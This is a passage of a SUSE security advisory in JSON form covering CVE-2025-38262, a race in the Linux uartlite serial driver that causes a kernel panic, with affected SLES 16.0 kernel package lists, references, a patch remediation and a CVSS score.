"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38262",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38262"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: serial: uartlite: register uart driver in init\n\nWhen two instances of uart devices are probing, a concurrency race can\noccur. If one thread calls uart_register_driver function, which first\nallocates and assigns memory to \u0027uart_state\u0027 member of uart_driver\nstructure, the other instance can bypass uart driver registration and\ncall ulite_assign. This calls uart_add_one_port, which expects the uart\ndriver to be fully initialized. This leads to a kernel panic due to a\nnull pointer dereference:\n\n[ 8.143581] BUG: kernel NULL pointer dereference, address: 00000000000002b8\n[ 8.156982] #PF: supervisor write access in kernel mode\n[ 8.156984] #PF: error_code(0x0002) - not-present page\n[ 8.156986] PGD 0 P4D 0\n...\n[ 8.180668] RIP: 0010:mutex_lock+0x19/0x30\n[ 8.188624] Call Trace:\n[ 8.188629] ? __die_body.cold+0x1a/0x1f\n[ 8.195260] ? page_fault_oops+0x15c/0x290\n[ 8.209183] ? __irq_resolve_mapping+0x47/0x80\n[ 8.209187] ? exc_page_fault+0x64/0x140\n[ 8.209190] ? asm_exc_page_fault+0x22/0x30\n[ 8.209196] ? mutex_lock+0x19/0x30\n[ 8.223116] uart_add_one_port+0x60/0x440\n[ 8.223122] ? proc_tty_register_driver+0x43/0x50\n[ 8.223126] ? tty_register_driver+0x1ca/0x1e0\n[ 8.246250] ulite_probe+0x357/0x4b0 [uartlite]\n\nTo prevent it, move uart driver registration in to init function. This\nwill ensure that uart_driver is always registered when probe function\nis called.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38262",
"url": "https://www.suse.com/security/cve/CVE-2025-38262"
},
{
"category": "external",
"summary": "SUSE Bug 1246282 for CVE-2025-38262",
"url": "https://bugzilla.suse.com/1246282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
